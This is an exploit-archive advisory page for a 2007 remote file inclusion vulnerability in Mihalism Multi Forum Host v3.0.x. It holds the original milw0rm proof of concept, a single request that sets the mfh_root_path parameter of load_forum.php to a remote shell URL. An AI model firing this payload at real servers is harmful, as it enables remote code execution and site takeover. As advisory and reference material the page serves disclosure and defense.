header-logo
Suggest Exploit
vendor:
Multi Forum Host
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Multi Forum Host
Affected Version From: v3.0.x
Affected Version To: v3.0.x
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Mihalism Multi Forum Host <= v3.0.x Remote File Inclusion Vulnerability

The vulnerability allows an attacker to include a remote file in the script page load_forum.php, potentially leading to remote code execution.

Mitigation:

Update to a version higher than v3.0.x that fixes the vulnerability.
Source

Exploit-DB raw data:

    ########                  ######              ####                ######  ######
  ##      ##                    ##                  ##                  ####  ####  
  ##              ######        ##            ####  ##                  ####  ####  
  ##            ##      ##      ##          ##    ####                  ##  ##  ##  
  ##    ######  ##      ##      ##    ##    ##      ##                  ##      ##  
  ##      ##    ##      ##      ##    ##    ##      ##                  ##      ##  
    ######        ######      ##########      ##########              ######  ######
                                                        ##############              

####################################################################################
###### Mihalism Multi Forum Host <= v3.0.x Remote File Inclusion Vulnerability #####
###### Script Page : http://www.mihalism.com/misc/downloads/                   #####
###### POC :                                                                   #####
###### /ScriptPage/source/includes/load_forum.php?mfh_root_path=http://Shell   #####
###### D0rK :                                                                  #####
###### Mihalism Multi Forum Host © 2007                                        #####
###### GREETZ TO :                                                             #####
###### TrYaG-TeaM , H-T Team , RoMaNcYxHaCkEr , Asb-May's Team & ALL           #####
####################################################################################

# milw0rm.com [2007-12-29]

Navigation

Suggest Exploit

Services By CQR